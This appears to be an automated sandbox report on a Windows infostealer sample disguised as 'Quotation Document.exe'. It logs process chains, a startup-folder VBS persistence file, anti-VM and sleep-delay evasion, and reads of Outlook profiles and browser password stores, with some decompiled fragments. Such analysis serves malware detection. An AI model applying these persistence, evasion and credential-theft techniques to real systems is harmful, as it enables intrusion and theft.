Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs"

Source: Quotation Document.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Quotation Document.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation Document.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002DBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Quotation Document.exe

ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\Quotation Document.exe

File read: C:\Users\user\Desktop\Quotation Document.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quotation Document.exe "C:\Users\user\Desktop\Quotation Document.exe"
Source: C:\Users\user\Desktop\Quotation Document.exe	Process created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\Desktop\Quotation Document.exe"
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Quotation Document.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\AppData\Local\emboweling\neophobia.exe"
Source: C:\Users\user\Desktop\Quotation Document.exe	Process created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\Desktop\Quotation Document.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Quotation Document.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\AppData\Local\emboweling\neophobia.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation Document.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quotation Document.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Quotation Document.exe

Static file information: File size 1175717 > 1048576

Source:

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

7_2_004019F0

Source: Quotation Document.exe	Static PE information: real checksum: 0xa2135 should be: 0x1258ad
Source: neophobia.exe.0.dr	Static PE information: real checksum: 0xa2135 should be: 0x1258ad

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041C40C push cs; iretd	7_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00423149 push eax; ret	7_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041C50E push cs; iretd	7_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004231C8 push eax; ret	7_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040E21D push ecx; ret	7_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041C6BE push ebx; ret	7_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040BB97 push dword ptr [ecx-75h]; iretd	7_2_0040BBA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02934653 pushfd ; iretd	7_2_02934654
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02931199 pushfd ; ret	7_2_0293119A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_050F2941 push 8BF08BFDh; iretd	7_2_050F2946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_064D7A40 push es; ret	7_2_064D7A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_064D5291 pushad ; iretd	7_2_064D5292
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_064D73B2 push es; retf	7_2_064D73B4

Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\Quotation Document.exe

File created: C:\Users\user\AppData\Local\emboweling\neophobia.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (8).png

Source: C:\Users\user\Desktop\Quotation Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\emboweling\neophobia.exe

API/Special instruction interceptor: Address: 3EC9F34

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

7_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598904	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598794	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598684	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598473	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597467	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597226	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596122	Jump to behavior
